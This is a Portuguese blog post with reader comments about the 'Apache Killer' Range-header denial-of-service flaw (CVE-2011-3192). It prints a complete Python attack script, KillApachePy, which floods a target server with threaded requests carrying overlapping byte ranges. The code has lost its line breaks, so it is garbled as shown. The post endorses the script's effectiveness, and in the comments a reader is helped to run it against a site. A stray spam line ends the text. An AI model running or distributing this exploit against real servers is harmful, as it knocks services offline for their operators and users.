O Apache Killer foi uma vulnerabilidade divulgada no meio de agosto que deixou muito administrador Web de cabelos em pé e não é para menos já que Apache corresponde em mais de 60% dos servidores HTTP que rodam na Internet, info by Netcrat.com.
Acontece que tem muito administrador desavisado que ainda não implementou nenhuma forma de mitigação deste ataque, com isso, já saiu novas versões do exploit que explora o ataque apache killer, vejam um deles desenvolvido em Python:
#!/usr/bin/env python import optparse, os, re, socket, threading, time, urllib, urllib2, urlparse NAME = "KillApachePy (Range Header DoS CVE-2011-3192)" VERSION = "0.1d" AUTHOR = "Miroslav Stampar (http://unconciousmind.blogspot.com | @stamparm)" LICENSE = "Public domain (FREE)" SLEEP_TIME = 3 # time to wait for new thread slots (after max number reached) RANGE_NUMBER = 1024 # number of range subitems forming the DoS payload USER_AGENT = "KillApachePy (%s)" % VERSION def attack(url, user_agent=None, method='GET', proxy=None): url = ("http://%s" % url) if '://' not in url else url host = urlparse.urlparse(url).netloc if proxy and not re.match('Ahttp(s)?://[^:]+:[0-9]+(/)?Z', proxy, re.I): print "(x) Invalid proxy address used" exit(-1) proxy_support = urllib2.ProxyHandler({'http': proxy} if proxy else {}) opener = urllib2.build_opener(proxy_support) urllib2.install_opener(opener) class _MethodRequest(urllib2.Request): # Create any HTTP (e.g. HEAD/PUT/DELETE) request type with urllib2 def set_method(self, method): self.method = method.upper() def get_method(self): return getattr(self, 'method', urllib2.Request.get_method(self)) def _send(check=False): #Send the vulnerable request to the target if check: print "(i) Checking target for vulnerability..." payload = "bytes=0-,%s" % ",".join("5-%d" % item for item in xrange(1, RANGE_NUMBER)) try: headers = { 'Host': host, 'User-Agent': user_agent or USER_AGENT, 'Range': payload, 'Accept-Encoding': 'gzip, deflate' } req = _MethodRequest(url, None, headers) req.set_method(method) response = urllib2.urlopen(req) if check: return response and ('byteranges' in repr(response.headers.headers) or response.code == 206) except urllib2.URLError, msg: if any([item in str(msg) for item in ('Too many', 'Connection reset')]): pass elif 'timed out' in str(msg): print "r(i) Server seems to be choked ('%s')" % msg else: print "(x) Connection error ('%s')" % msg if check or 'Forbidden' in str(msg): os._exit(-1) except Exception, msg: raise try: if not _send(check=True): print "(x) Target does not seem to be vulnerable" else: print "(o) Target seems to be vulnerablen" quit = False while not quit: threads = [] print "(i) Creating new threads..." try: while True: thread = threading.Thread(target=_send) thread.start() threads.append(thread) except KeyboardInterrupt: quit = True raise except Exception, msg: if 'new thread' in str(msg): print "(i) Maximum number of new threads created (%d)" % len(threads) else: print "(x) Exception occured ('%s')" % msg finally: if not quit: print "(o) Waiting for %d seconds to acquire new threads" % SLEEP_TIME time.sleep(SLEEP_TIME) print except KeyboardInterrupt: print "r(x) Ctrl-C was pressed" os._exit(1) if __name__ == "__main__": print "%s #v%sn by: %sn" % (NAME, VERSION, AUTHOR) parser = optparse.OptionParser(version=VERSION) parser.add_option("-u", dest="url", help="Target url (e.g. "http://www.target.com/index.php")") parser.add_option("--agent", dest="agent", help="User agent (e.g. "Mozilla/5.0 (Linux)")") parser.add_option("--method", dest="method", default='GET', help="HTTP method used (default: GET)") parser.add_option("--proxy", dest="proxy", help="Proxy (e.g. "http://127.0.0.1:8118")") options, _ = parser.parse_args() if options.url: result = attack(options.url, options.agent, options.method, options.proxy) else: parser.print_help()
Alguns amigos já o testaram e atestaram a sua eficácia. Resta saber por que diabos o administrador do ambiente não atualizou o velho índio.
gustavo !! num sei o q é mano toda ves q eu jogo no google , corujadeti pra ele busca pra min acessa o site aparece o link do blog na descrição isso aki /home/corujadeti/www/blog/wp-content/uploads/ !!
é a droga de um bug do wordpress — está no to do desta semana..
Opa Gustavo
Entao fui usar o script acima mas deu um erro:
——————–
python apachekiller.py http://www.site.com.br/index.php
File “apachekiller.py”, line 15
url = (“http://%s” % url) if ‘://’ not in url else url
^
IndentationError: expected an indented block
————————
O que pode ser ?
Grato.
Jacó Ramos
Jacó, veja o erro na linha 15 deve ter faltado algo. Assumo que posso ter copiado o script com algum erro. Para resolver isso, acesse o link que eu passei para baixá-lo sem intervenções ou erros 🙂
Jáco, está faltando você especificar a flag -u que referece a url a ser testada.
python apachekiller.py -u http://www.site.com.br/index.php
Att,
Opa pessoal
Muito obrigado pela ajuda,
Funcionou! só resolvi, copiei do link : https://github.com/stamparm/KillApachePy
Pois antes tinha copiado e colado o código do post!
Grato
Jacó Ramos
accutane alternatives acne